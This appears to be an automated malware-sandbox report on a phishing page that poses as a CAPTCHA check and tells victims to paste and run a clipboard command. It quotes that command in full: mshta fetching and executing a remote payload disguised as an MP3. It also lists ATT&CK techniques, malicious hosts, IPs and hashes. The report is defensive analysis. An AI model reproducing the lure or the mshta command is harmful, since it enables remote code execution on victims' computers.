        Source: screenshotOCR Text: e about:blank X reCAPTCHV3 demo abjectstara ge.ap-sing apore-2.oracl eclo iho/a/random -check. html Verify You Are Human Please veri that ou are a human to continue. Verification Steps 1. Press Windows Button 2. Press CTRL + V 3. Press Enter 08:22 ENG p Type here to search 10/03/2025
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeClipboard modification: mshta https://music-albums.oss-ap-southeast-7.aliyuncs.com/soundtrack.mp3 # '' am nt a rbt: VerificationUID:885203
        Source: C:\Windows\System32\mshta.exeWindow / User API: threadDelayed 548
        Source: C:\Windows\System32\mshta.exe TID: 5676Thread sleep count: 548 > 30
        Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
        Browser Extensions
        1
        Process Injection
        11
        Masquerading
        OS Credential Dumping1
        Virtualization/Sandbox Evasion
        Remote Services1
        Email Collection
        1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/Job1
        DLL Side-Loading
        1
        DLL Side-Loading
        1
        Virtualization/Sandbox Evasion
        LSASS Memory1
        Application Window Discovery
        Remote Desktop ProtocolData from Removable Media3
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        Extra Window Memory Injection
        1
        Process Injection
        Security Account Manager3
        System Information Discovery
        SMB/Windows Admin SharesData from Network Shared Drive3
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        DLL Side-Loading
        NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture4
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        File Deletion
        LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Extra Window Memory Injection
        Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        https://tavipulse.com/67a0c8749504c05865fba2d30%Avira URL Cloudsafe
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/webfonts/fa-brands-400.woff20%Avira URL Cloudsafe
        https://objectstorage.ap-singapore-2.oraclecloud.com/favicon.ico0%Avira URL Cloudsafe
        https://music-albums.oss-ap-southeast-7.aliyuncs.com/soundtrack.mp3100%Avira URL Cloudmalware
        https://fp-afd.azurefd.us/apc/trans.gif?2ddea2ac0734d0cd624551c56ba6a8250%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        objectstorage.ap-singapore-2.oci.oraclecloud.com
        217.142.168.1
        truetrue
          unknown
          music-albums.oss-ap-southeast-7.aliyuncs.com
          8.213.160.91
          truetrue
            unknown
            cdnjs.cloudflare.com
            104.17.24.14
            truefalse
              high
              lb-nur-1.6750bdcc5432dff847ed3608.click
              167.235.109.63
              truefalse
                unknown
                www.google.com
                142.250.186.100
                truefalse
                  high
                  objectstorage.ap-singapore-2.oraclecloud.com
                  unknown
                  unknownfalse
                    unknown
                    tavipulse.com
                    unknown
                    unknownfalse
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      https://objectstorage.ap-singapore-2.oraclecloud.com/n/ax4mqlu25efi/b/rigiho/o/random-check.htmlfalse
                        unknown
                        https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.cssfalse
                          high
                          https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/webfonts/fa-brands-400.woff2false
                          • Avira URL Cloud: safe
                          unknown
                          https://music-albums.oss-ap-southeast-7.aliyuncs.com/soundtrack.mp3true
                          • Avira URL Cloud: malware
                          unknown
                          https://objectstorage.ap-singapore-2.oraclecloud.com/favicon.icotrue
                          • Avira URL Cloud: safe
                          unknown
                          https://tavipulse.com/67a0c8749504c05865fba2d3false
                            unknown
                            https://fp-afd.azurefd.us/apc/trans.gif?2ddea2ac0734d0cd624551c56ba6a825false
                            • Avira URL Cloud: safe
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            104.17.24.14
                            cdnjs.cloudflare.comUnited States
                            13335CLOUDFLARENETUSfalse
                            1.1.1.1
                            unknownAustralia
                            13335CLOUDFLARENETUSfalse
                            217.142.168.1
                            objectstorage.ap-singapore-2.oci.oraclecloud.comSweden
                            16253BORDERLIGHT-ASVretgrand18SEtrue
                            216.58.212.131
                            unknownUnited States
                            15169GOOGLEUSfalse
                            74.125.133.84
                            unknownUnited States
                            15169GOOGLEUSfalse
                            142.250.74.206
                            unknownUnited States
                            15169GOOGLEUSfalse
                            8.213.160.91
                            music-albums.oss-ap-southeast-7.aliyuncs.comSingapore
                            45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                            142.251.40.206
                            unknownUnited States
                            15169GOOGLEUSfalse
                            167.235.109.63
                            lb-nur-1.6750bdcc5432dff847ed3608.clickUnited States
                            3525ALBERTSONSUSfalse
                            142.250.181.238
                            unknownUnited States
                            15169GOOGLEUSfalse
                            142.250.185.174
                            unknownUnited States
                            15169GOOGLEUSfalse
                            142.250.185.163
                            unknownUnited States
                            15169GOOGLEUSfalse
                            142.250.185.131
                            unknownUnited States
                            15169GOOGLEUSfalse
                            142.250.186.100
                            www.google.comUnited States
                            15169GOOGLEUSfalse
                            172.217.16.195
                            unknownUnited States
                            15169GOOGLEUSfalse
                            IP
                            192.168.2.16
                            Joe Sandbox version:42.0.0 Malachite
                            Analysis ID:1633636
                            Start date and time:2025-03-10 13:21:19 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:defaultwindowsinteractivecookbook.jbs
                            Sample URL:https://tavipulse.com/67a0c8749504c05865fba2d3
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:18
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • EGA enabled
                            Analysis Mode:stream
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal80.phis.win@24/1@9/157
                            • Exclude process from analysis (whitelisted): SIHClient.exe, SgrmBroker.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 142.250.181.238, 142.250.185.163, 142.250.185.174, 74.125.133.84, 216.58.206.46, 142.251.40.206, 173.194.17.198, 142.250.185.131, 216.58.212.131, 23.60.203.209, 20.12.23.50
                            • Excluded domains from analysis (whitelisted): r1.sn-hp57knd6.gvt1.com, fs.microsoft.com, clients2.google.com, accounts.google.com, redirector.gvt1.com, slscr.update.microsoft.com, r1---sn-hp57knd6.gvt1.com, clientservices.googleapis.com, clients.l.google.com, www.gstatic.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtEnumerateKey calls found.
                            • Report size getting too big, too many NtOpenFile calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • VT rate limit hit for: https://tavipulse.com/67a0c8749504c05865fba2d3
                            Process:C:\Windows\System32\mshta.exe
                            File Type:Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, JntStereo
                            Category:dropped
                            Size (bytes):4807623
                            Entropy (8bit):7.972997667438395
                            Encrypted:false
                            SSDEEP:
                            MD5:05E42BA5EB9ADAD3643C11F3460889CE
                            SHA1:B84D1522F11B5258921FFCF3F3D9427AEB6232FB
                            SHA-256:6FC3DAAD8BC4975AC66ECDFBC78C8F03787A2D3B54EA5CFB36996143BB04D715
                            SHA-512:9EF842DE25B10099C17EEE6E0B3CB65773CD37D736AF97A092D80B0EB04AB85122D8B741D87A3629DF239D02D28889A6EB4C0166A572C8BE4206231D064324F3
                            Malicious:false
                            Reputation:unknown
                            Preview:ID3......'TIT2.......Fire.TPE1.......Seth Power.TRCK.......3.TALB.......Magnolia Soul.TDRC.......2017.TCON.......Pop.TCOM.......Seth Power.WPUB......http://www.jamendo.com.TPUB.......http://www.jamendo.com.TXXX..."...Tagging time.2018-06-20T06:50:58.TENC...&...Jamendo:http://www.jamendo.com| LAME.WOAS...'..http://www.jamendo.com/en/album/171527.COMM...(...eng.http://www.jamendo.com cc_standard.WOAF...(..http://www.jamendo.com/en/track/1483587.WOAR...(..http://www.jamendo.com/en/artist/503014.WCOP...,..http://creativecommons.org/licenses/by/3.0/.TCOP...-...http://creativecommons.org/licenses/by/3.0/.APIC...V...image/jpeg.........JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."........................................T.........................!1..AQa."q..2B....#3Rbr...$4CSs.....%....&c.....'5DEFTt................................(.....................!1..A.."Q2aqB.R..........
                            No static file info